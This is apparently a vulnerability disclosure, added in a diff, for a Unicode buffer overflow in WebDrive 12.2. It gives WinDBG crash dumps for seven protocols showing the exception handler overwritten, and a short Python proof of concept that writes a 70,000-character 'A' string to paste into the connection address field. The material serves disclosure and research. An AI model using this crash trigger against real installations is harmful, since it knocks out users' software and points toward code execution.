+#Software Link: https://www.webdrive.com/products/webdrive/download/
+#Version: 12.2 (build # 4172) 32 bit
+#Date found: 31.05.2015
+#Date published: 31.05.2015
+#Platform: Windows 7 Ultimate
+#Bug: Multiple Buffer Overflow UNICODE
+'''
+----------------------------------------------------------------------------
+Summary:
+Unlike a typical FTP client, WebDrive allows you to open and
+edit server-based, files without the additional step of downloading the file.
+Using a simple wizard, you assign a network drive letter to the FTP Server.
+WebDrive supports additional protocols such as WebDAV, SFTP and Amazon S3 and
+maps a drive letter to each of these servers.You can map unique drive letters
+to multiple servers.Download the full-function 20-day trial of WebDrive and
+make file management on remote servers easier and more efficient!
+------------------------------------------------------------------------------
+WebDrive connects to many types of web servers,
+as well as servers in the cloud.You can use WebDrive
+to access your files on all of the following server
+types and protocols:
+
+WebDAV ------------>Vulnerable
+WebDAV over SSL---->Vulnerable
+FTP---------------->Vulnerable
+FTP over SSL------->Vulnerable
+Amazon S3---------->Vulnerable
+SFTP--------------->Vulnerable
+FrontPage Server--->Vulnerable
+
+------------------------------------------------------------------------------
+How to Crash:
+
+Copy the AAAA...string from WebDrive.txt to clipboard, create a connection
+and paste it in the URL/Address and attempt to connect.
+
+
+WebDAV
+============================
+Crash Analysis using WinDBG:
+============================
+(430.9f8): Access violation - code c0000005 (!!! second chance !!!)
+eax=001cad5c ebx=02283af8 ecx=00000041 edx=02289d9c esi=fdf47264 edi=001cad5c
+eip=0055ff2b esp=001c8cfc ebp=001c8d00 iopl=0 nv up ei pl nz na pe nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
+*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\WebDrive\webdrive.exe
+webdrive+0x30ff2b:
+0055ff2b 66890c16 mov word ptr [esi+edx],cx ds:0023:001d1000=????
+0:000> !exchain
+001c8d20: webdrive+35a24e (005aa24e)
+001cb768: webdrive+1c0041 (00410041)
+Invalid exception stack at 00410041
+0:000> d 001cb768
+001cb768 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
+001cb778 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
+001cb788 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
+001cb798 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
+001cb7a8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
+001cb7b8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
+001cb7c8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
+001cb7d8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
+
+WebDAV over SSL
+============================
+Crash Analysis using WinDBG:
+============================
+(b88.ca0): Access violation - code c0000005 (!!! second chance !!!)
+eax=00000000 ebx=00000000 ecx=00410041 edx=775e660d esi=00000000 edi=00000000
+eip=00410041 esp=000a1238 ebp=000a1258 iopl=0 nv up ei pl zr na pe nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
+*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\system32\ipworks9.dll -
+ipworks9!IPWorks_SNPP_Get+0x57f:
+00410041 038d4df0e8da add ecx,dword ptr [ebp-25170FB3h] ss:0023:daf302a5=????????
+0:000>!exchain
+Invalid exception stack at 00410041
+
+FTP and FTP over SSL
+============================
+Crash Analysis using WinDBG:
+============================
+(834.70c): Access violation - code c0000005 (!!! second chance !!!)
+eax=00000000 ebx=00410041 ecx=00000400 edx=00000000 esi=002d84f0 edi=00000000
+eip=775e64f4 esp=002d8488 ebp=002d84dc iopl=0 nv up ei pl nz na po nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
+ntdll!KiFastSystemCallRet:
+775e64f4 c3 ret
+0:000> !exchain
+002d8c1c: webdrive+35a24e (015da24e)
+002db664: 00410041
+Invalid exception stack at 00410041
+
+Amazon S3
+============================
+Crash Analysis using WinDBG:
+============================
+(a64.a98): Access violation - code c0000005 (!!! second chance !!!)
+eax=00000000 ebx=00410041 ecx=00000400 edx=00000000 esi=002f8550 edi=00000000
+eip=775e64f4 esp=002f84e8 ebp=002f853c iopl=0 nv up ei pl nz na po nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
+ntdll!KiFastSystemCallRet:
+775e64f4 c3 ret
+0:000> !exchain
+002f8c7c: webdrive+35a24e (015da24e)
+002fb6c4: 00410041
+Invalid exception stack at 00410041
+
+SFTP
+============================
+Crash Analysis using WinDBG:
+============================
+(848.9a8): Access violation - code c0000005 (!!! second chance !!!)
+eax=00000000 ebx=00410041 ecx=00000400 edx=00000000 esi=002380f8 edi=00000000
+eip=775e64f4 esp=00238090 ebp=002380e4 iopl=0 nv up ei pl nz na po nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
+ntdll!KiFastSystemCallRet:
+775e64f4 c3 ret
+0:000> !exchain
+00238824: webdrive+35a24e (015da24e)
+0023b26c: 00410041
+Invalid exception stack at 00410041
+
+FrontPage Server
+============================
+Crash Analysis using WinDBG:
+============================
+(cd4.710): Access violation - code c0000005 (!!! second chance !!!)
+eax=007ba9f0 ebx=05d29738 ecx=00000041 edx=05d2fd48 esi=faa912b8 edi=007ba9f0
+eip=003bff2b esp=007b8990 ebp=007b8994 iopl=0 nv up ei pl nz na pe nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
+*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\WebDrive\webdrive.exe
+webdrive+0x30ff2b:
+003bff2b 66890c16 mov word ptr [esi+edx],cx ds:0023:007c1000=????
+0:000> !exchain
+007b89b4: webdrive+35a24e (0040a24e)
+007bb3fc: webdrive+360041 (00410041)
+Invalid exception stack at 00410041
+
+'''
+
+#Proof of Concept:
+
+buffer="http://"
+buffer+="\x41" * 70000
+off=buffer
+
+try:
+ out_file = open("WebDrive.txt",'w')
+ out_file.write(off)
+ out_file.close()
+ print("[*] Malicious txt file created successfully")
+except:
+ print "[!] Error creating file"
+